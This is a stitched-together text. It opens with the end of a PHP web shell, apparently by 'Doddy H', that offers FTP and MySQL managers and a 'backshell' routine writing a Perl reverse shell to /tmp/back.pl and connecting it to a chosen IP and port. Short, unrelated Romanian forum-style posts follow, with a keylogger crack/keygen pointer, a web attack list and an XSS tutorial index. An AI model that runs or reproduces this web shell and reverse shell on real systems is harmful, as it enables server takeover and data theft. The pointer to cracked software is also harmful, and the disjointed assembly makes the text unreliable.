href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">Enter</a></td>"; echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>"; echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=dir&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>"; echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>"; echo "<td class=main>--</a></td><tr>"; } else { echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">--</a></td>"; echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>"; echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=file&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>"; echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>"; echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&downfile=".$ver.">Download</a></td><tr>"; } } echo "</table>"; } else { echo "<b>[-] Error in the server</b><br><br>"; } } if (isset($_GET['downfile'])) { $enter = ftp_connect($_GET['serverftp']); $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']); $nuevo = fopen(basename($_GET['downfile']),'w'); if (ftp_fget($enter,$nuevo,$_GET['downfile'], FTP_ASCII, 0)) { echo "<script>alert('File Download');</script>"; echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>'; } else { echo "<script>alert('Error in the download');</script>"; } ftp_close($enter); fclose($nuevo); } if (isset($_GET['newdirftp'])) { $enter = ftp_connect($_GET['serverftp']); $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']); if (ftp_mkdir($enter,$_GET['diar'].$_GET['newdirftp'])) { echo "<script>alert('Directory created');</script>"; echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>'; } else { echo "<script>alert('Error');</script>"; } } if (isset($_GET['backshell'])) { echo " <form action='' method=GET> IP : <input type=text name=ip value=".$_SERVER['REMOTE_ADDR']."><br> Port : <input type=text name=port value=666><br><br> Type : <select name=tipo> <option>Perl</option> </select> <br><br><br> <input type=submit value=Conectar> "; } if (isset($_GET['ip'])) { if ($_GET['tipo']=="Perl") { $code = ' #!usr/bin/perl #Reverse Shell 0.1 #By Doddy H use IO::Socket; print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n"; unless (@ARGV == 2) { print "[Sintax] : $0 <host> <port>\n\n"; exit(1); } else { print "[+] Starting the connection\n"; print "[+] Enter in the system\n"; print "[+] Enjoy !!!\n\n"; conectar($ARGV[0],$ARGV[1]); tipo(); } sub conectar { socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp")); connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0]))); open (STDIN,">&REVERSE"); open (STDOUT,">&REVERSE"); open (STDERR,">&REVERSE"); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ($^O =~/Win32/ig) { infowin(); system("cmd.exe"); } else { infolinux(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : ".Win32::DomainName()."\n"; print "[+] OS Version : ".Win32::GetOSName()."\n"; print "[+] Username : ".Win32::LoginName()."\n\n\n"; } sub infolinux { print "[+] System information\n\n"; system("uname -a"); print "\n\n"; } # ¿ The End ? '; $de = $_SERVER["HTTP_USER_AGENT"]; if(eregi("Win",$de)){ if ($test = fopen("back.pl","w")) { echo "<br><br><b>[+] Shell Created</b><br>"; } else { echo "<br><br><b>[-] Error creating the shell</b><br>"; } } else { if ($test = fopen("/tmp/back.pl","w")) { echo "<br><br><b>[+] Shell Created</b><br>"; } else { echo "<br><br><b>[-] Error creating the shell</b><br>"; } } if (fwrite($test,$code)) { if(eregi("Win",$de)){ if (chmod("back.pl",0777)) { echo "<b>[+] Perms Changed<br></b>"; } else { echo "<b>[-] Not priviligies to changed permissions</b><br>"; } echo "<b>[+] Loading Shell</b><br><br><br>"; echo "<fieldset>"; if (!system("perl back.pl ".$_GET['ip']. " ".$_GET['port'])) { echo "<script>alert('Error Loading Shell');</script>"; } echo "</fieldset>"; } else { if (chmod("/tmp/back.pl",0777)) { echo "<b>[+] Perms Changed<br></b>"; } else { echo "<b>[-] Not priviligies to changed permissions</b><br>"; } echo "<b>[+] Loading Shell</b><br><br><br>"; echo "<fieldset>"; if (!system("cd /tmp;perl back.pl ".$_GET['ip']. " ".$_GET['port'])) { echo "<script>alert('Error Loading Shell');</script>"; } echo "</fieldset>"; } } else { echo "<br><b>[-] Error writing in the shell<br><br></b>"; } } } if (isset($_GET['sql'])) { echo " <h2>SQL Manager</h2><br><br> <form action='' method=GET> Server : <input type=text name=host value=localhost><br> User : <input type=text name=usuario value=root><br> Pass : <input type=text name=password value=123><br><br> <input type=submit name=entersql value=Connect> </form> "; } if (isset($_GET['entersql'])) { if ($mysql = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password'])) { if ($databases = @mysql_list_dbs($mysql)) { echo "<br><br><h2>Databases Found</h2><br>"; echo "<table>"; while($dat = @mysql_fetch_row($databases)) { foreach($dat as $indice => $valor) { echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&enterdb=".$valor.">Enter</a></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajardb=".$valor.">Download</a></td><tr>"; } } echo "</table>"; } else { echo "<script>alert('Error loading databases');</script>"; exit(1); } } else { echo "<script>alert('Error');</script>"; exit(1); } } if (isset($_GET['enterdb'])) { $mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']); mysql_select_db($_GET['enterdb']); $tablas = mysql_query("show tables from ".$_GET['enterdb']) or die("error"); echo "<br><h2>Tables Found</h2><br><br><table>"; while ($tabla = mysql_fetch_row($tablas)) { foreach($tabla as $indice => $valor) { echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&entertable=".$valor."&condb=".$_GET['enterdb'].">Enter</a></td></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajartabla=".$valor."&condb=".$_GET['enterdb'].">Download</a><tr>"; } } echo "</table>"; } if (isset($_GET['entertable'])) { $mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']); mysql_select_db($_GET['condb']); echo "<br><h2>SQL Manager</h2> <br><br> <form action='' method=POST> Consulta SQL : <input type=text name=sentencia size=70> <br><br><br> <input type=hidden name=host value=".$_GET['host']."> <input type=hidden name=usuario value=".$_GET['usuario']."> <input type=hidden name=password value=".$_GET['password']."> <input type=hidden name=condb value=".$_GET['database']."> <input type=hidden name=entertable value=".$_GET['tabla']."> <input type=submit name=mostrar value=eNViar> </form> <br><br><br><br><br>"; $conexion = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>"); mysql_select_db($_GET['condb']); if (isset($_POST['mostrar'])) { if(!empty($_POST['sentencia'])) { $resultado = mysql_query($_POST['sentencia']); } else { $resultado = mysql_query("SELECT * FROM ".$_GET['entertable']); } $numer = 0; echo "<table>"; for ($i=0;$i< mysql_num_fields($resultado);$i++) { echo "<th class=main>".mysql_field_name($resultado,$i)."</th>"; $numer++; } while($dat = mysql_fetch_row($resultado)) { echo "<tr>"; foreach($dat as $val) { echo "<td class=main>".$val."</td>"; } } echo "</tr></table>"; } } echo "<br><br>"; } else { echo " <form action='' method=POST> user : <input type=text name=user><br> pass : <input type=text name=pass><br><br> <input type=submit value=Login> </form> "; } // ¿ The End ? ?>

code: {******************************************************************************} {** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING **} {******************************************************************************} {** **} {** The prototypes, declarations and information in this file has been **} {** compiled from various sources as well as through reverse engineering **} {** techniques. We make no guarantee as to the correctness of the contents. **} {** Caution is recommended, USE AT YOUR OWN RISK. **} {** **} {******************************************************************************} lam folosit de cateva ori si e foarte util http://sandsprite.com/shellcode_2_exe.php iDefense Cyber Intelligence, Threat Intelligence and Security - Verisign pentru a analiza exploits e util sa treci shellcode in exe, script php numai copiat shellcode in final de exe sau ceva similar, exe e un loader de shellcode..

bun venit, si spor la invatat!

incercati aici :Micro Keylogger serial number key code crack keygen nus sigur dar puteti sa gasiti

em E TRADUS CU GOOGLE, nui vina mea, in spaniola daca il lasam era mai greu, asa ca am tradus in romana, cu google.

XSS CSRF Path Traversal Null Byte OS Commanding File Inclusion Remote File Inclusion Information Disclosure SQL Injection/Blind SQL Injection File Upload SURSA: webattack

paginii 771 document : The_Web_Application_Hackers_Handbook_-_Discovering_and_Exploiting_Security_Flaws By RStone.pdf sursa: OverSec

Indice: 1.- Introducción 2.- Tipos de Ataques - Reflected Cross Site Scripting (XSS Reflejado) - Stored Cross Site Scripting (XSS Persistente) - DOM Cross Site Scripting (DOM XSS) - Cross Site Flashing (XSF) - Cross Site Request/Reference Forgery (CSRF) - Cross Frame Scripting (XFS) - Cross Zone Scripting (XZS) - Cross Agent Scripting (XAS) - Cross Referer Scripting (XRS) - Denial of Service (XSSDoS) - Flash! Attack - Induced XSS - Image Scripting - anti-DNS Pinning - IMAP3 XSS - MHTML XSS - Expect Vulnerability 3.- Evitando Filtros 4.- PoC examples - Bypassing filters - Data Control PoC - Frame Jacking PoC 5.- Técnicas de ataque + Classic XSS - Robando “cookies” + XSS Proxy + XSS Shell + Ajax Exploitation + XSS Virus / Worms + Router jacking + WAN Browser hijacking - DNS cache poison - XSS Injected code on server - Practical Browser Hijacking 6.- XSS Cheats - Fuzz Vectors 7.- Screenshots 8.- Herramientas 9.- Links 10.- Bibliografía 11.- Licencia de uso 12.- Autor aici aveti un tutorial complet, de aici am invatat si eu cate ceva, sigur o sa va ajute! document : http://xsser.sourceforge.net/xsser/XSS_for_fun_and_profit_SCG09.pdf stiu ca trebuie postat in limba engleza, dar al postez aici, pentru ca se intelege destul de bine!

bun venit, si spor la ascultat..